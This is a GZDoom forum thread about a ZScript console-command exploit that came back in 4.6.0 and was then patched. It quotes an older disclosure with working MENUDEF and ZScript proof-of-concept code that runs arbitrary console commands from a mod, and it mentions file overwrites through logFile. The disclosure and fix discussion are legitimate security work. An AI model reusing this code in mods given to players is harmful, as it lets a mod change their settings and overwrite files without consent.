Console Command Exploit
Moderator: GZDoom Developers
-
- Lead GZDoom+Raze Developer
- Posts: 49143
- Joined: Sat Jul 19, 2003 10:19 am
- Location: Germany
Re: Console Command Exploit
This has already been fixed after 4.6.0. Current devbuilds will throw a VM abort if this is launched.
-
- Posts: 853
- Joined: Mon May 10, 2021 8:08 pm
- Preferred Pronouns: He/Him
- Operating System Version (Optional): EndeavorOS (basically Arch)
- Graphics Processor: Intel with Vulkan/Metal Support
Re: Console Command Exploit
Graf Zahl wrote:This has already been fixed after 4.6.0. Current devbuilds will throw a VM abort if this is launched.
So until the next official release, I have to be careful. Edit: or I have to use devbuilds.
-
- Posts: 2100
- Joined: Sun Aug 18, 2013 9:41 am
- Location: Philadelphia, PA
Re: Console Command Exploit
Interesting. I cannot reproduce on my copy of GZDoom 4.6.0.
-
- Posts: 853
- Joined: Mon May 10, 2021 8:08 pm
- Preferred Pronouns: He/Him
- Operating System Version (Optional): EndeavorOS (basically Arch)
- Graphics Processor: Intel with Vulkan/Metal Support
Re: Console Command Exploit
TheMightyHeracross wrote:Interesting. I cannot reproduce on my copy of GZDoom 4.6.0.
Does it crash? If it's fixed, it will crash, if not, it will say "HI!"
-
- Posts: 2100
- Joined: Sun Aug 18, 2013 9:41 am
- Location: Philadelphia, PA
Re: Console Command Exploit
Ah! Missed the part where I have to summon the "Evil" actor, yeah I get the message now. Good thing it's fixed already for the next version.
-
- Posts: 853
- Joined: Mon May 10, 2021 8:08 pm
- Preferred Pronouns: He/Him
- Operating System Version (Optional): EndeavorOS (basically Arch)
- Graphics Processor: Intel with Vulkan/Metal Support
Re: Console Command Exploit
Yeah, thank God a fix is alr in a devbuild. Now it's time to hope the fix doesn't break stuff... and to wait too...TheMightyHeracross wrote:Ah! Missed the part where I have to summon the "Evil" actor, yeah I get the message now. Good thing it's fixed already for the next version.
-
- Posts: 9696
- Joined: Sun Jan 04, 2004 5:37 pm
- Preferred Pronouns: They/Them
- Operating System Version (Optional): Debian Bullseye
- Location: Gotham City SAR, Wyld-Lands of the Lotus People, Dominionist PetroConfederacy of Saudi Canadia
Re: Console Command Exploit
The "Hi!" will also print in LZDoom 3.87c.
Anyone have any idea when this had started working again?
Anyone have any idea when this had started working again?
-
- Lead GZDoom+Raze Developer
- Posts: 49143
- Joined: Sat Jul 19, 2003 10:19 am
- Location: Germany
Re: Console Command Exploit
Some time ago I changed how the menu exploit guards work to make them more robust - but I missed one of the function requiring the change so it still used the old method which no longer worked because all its helper code was removed.
-
- Vintage GZDoom Developer
- Posts: 3147
- Joined: Fri Apr 23, 2004 3:51 am
- Location: Spain
Re: Console Command Exploit
Try with the latest devbuild.Matt wrote:The "Hi!" will also print in LZDoom 3.87c.
-
- Posts: 9696
- Joined: Sun Jan 04, 2004 5:37 pm
- Preferred Pronouns: They/Them
- Operating System Version (Optional): Debian Bullseye
- Location: Gotham City SAR, Wyld-Lands of the Lotus People, Dominionist PetroConfederacy of Saudi Canadia
Re: Console Command Exploit
As of June 30, crashes to desktop with "Attempt to execute CCMD 'echo hi!' outside of menu code".drfrag wrote:Try with the latest devbuild.Matt wrote:The "Hi!" will also print in LZDoom 3.87c.
-
- Lead GZDoom+Raze Developer
- Posts: 49143
- Joined: Sat Jul 19, 2003 10:19 am
- Location: Germany
Re: Console Command Exploit
It doesn't crash. A VM abort is not a crash!
-
- Posts: 3886
- Joined: Fri Feb 08, 2008 9:15 am
- Preferred Pronouns: She/Her
- Operating System Version (Optional): (btw I use) Arch
- Graphics Processor: nVidia with Vulkan support
- Location: Vigo, Galicia
-
- Lead GZDoom+Raze Developer
- Posts: 49143
- Joined: Sat Jul 19, 2003 10:19 am
- Location: Germany
Re: Console Command Exploit
It's still not a crash.
-
- Posts: 3886
- Joined: Fri Feb 08, 2008 9:15 am
- Preferred Pronouns: She/Her
- Operating System Version (Optional): (btw I use) Arch
- Graphics Processor: nVidia with Vulkan support
- Location: Vigo, Galicia
Re: Console Command Exploit
Actually it does crash immediately after with a segfault. I should report that as a bug. It happens after any fatal error.
-
- Posts: 853
- Joined: Mon May 10, 2021 8:08 pm
- Preferred Pronouns: He/Him
- Operating System Version (Optional): EndeavorOS (basically Arch)
- Graphics Processor: Intel with Vulkan/Metal Support
Re: Console Command Exploit
Good news, a VM abort happens in 4.6.1, rather than saying "Hi!" like in 4.6.0. Thanks devs! Peace of mind.The Zombie Killer wrote:[Developer's note: This post has been edited from its original form for clarity]
This post serves as disclosure for an exploit that was recently discovered in ZScript.
The exploit affects all versions between 3.0.0 to 3.2.3, but has been patched in 3.2.4.
The Exploit
ZScript has exposed various features to modders, one of these being the underlying code for the classes powering MENUDEF.
However, the exposure of this MENUDEF code has brought some security concerns along with it.
In MENUDEF, you are able to create menu items that will execute a console command when a user selects them, via the "Command" item.
The code behind this item has a private method named "DoCommand", which is effectively a ZScript version of Zandronum's famous "ConsoleCommand", but without the whitelist.
Normally, you aren't able to make use of DoCommand, as it's private and mostly barred off.
If the item's ZScript class is not "OptionMenuItemSafeCommand", the following checks are made:
You would expect this to cover the hole pretty well. However, it proved to be trivial to circumvent the above checks.
- The command will not execute if a menu is not active.
- The command will not execute if the active menu is not an OptionMenu.
- The command will not execute if the Command item does not exist in the active menu (eg, if you created it with new()).
You could create your own menu linked to ZScript and give it a "Command" item. From there you could modify the Command item's action (the console command it executes) and then proceed to open and close the menu to run the command. The entire MENUDEF file looks like this:
And all of the ZScript backing it up is as follows:Code: Select all
OptionMenu "ConsoleCommandMenu" { class "ConsoleCommandMenu" Command "", "" }
The ZScript code effectively queues up console commands using a custom structure, and executes them by opening and closing the menu after modifying the Command item's action (using the Init() method).Code: Select all
version "3.2.0" class ConsoleCommandMenu : OptionMenu { static void Execute(Name command) { Menu.SetMenu('ConsoleCommandMenu'); let desc = OptionMenuDescriptor(MenuDescriptor.GetDescriptor('ConsoleCommandMenu')); let item = OptionMenuItemCommand(desc.mItems[0]); item.Init("", command); item.Activate(); Menu.GetCurrentMenu().Close(); } } class ConsoleCommand { string Command; int GameTic; static play void Execute(string command) { ConsoleCommandHandler.QueueCommand(command); } } class ConsoleCommandHandler : EventHandler { private Array<ConsoleCommand> m_Commands; static void QueueCommand(string command) { let cmd = new("ConsoleCommand"); cmd.Command = command; cmd.GameTic = gametic; ConsoleCommandHandler( EventHandler.Find("ConsoleCommandHandler")) .m_Commands.Push(cmd); } override void WorldTick() { for(int i = 0; i < m_Commands.Size(); i++) { if (m_Commands[i].GameTic == gametic - 1) continue; m_Commands[i].Destroy(); m_Commands.Delete(i); i = -1; } } override void UiTick() { for(int i = 0; i < m_Commands.Size(); i++) { if (m_Commands[i].GameTic == gametic - 1) ConsoleCommandMenu.Execute(m_Commands[i].Command); } } }
After the above code has been written, all that's left to do for this to be usable is to hook up the EventHandler in MAPINFO:
And now we're free to execute console commands at will:Code: Select all
GameInfo { AddEventHandlers = "ConsoleCommandHandler" }
ConcernsCode: Select all
ConsoleCommand.Execute("echo hi!");
Of course, this brings with it a number of concerns. A very incomplete list of which can be found below:
As this exploit has been patched in 3.2.4 to the point of not being able to modify arbitrary files on a user's system, I strongly suggest that you update.
- A user's settings including bindings, audio volume, player name, colour, etc can all be permanently modified.
- Files on the user's system can be overwritten with the logFile command.
Sample
Attached below is a sample pk3 demonstrating the exploit. Run the sample with a version of GZDoom prior to 3.2.4 and spawn the "Evil" actor to see it in action.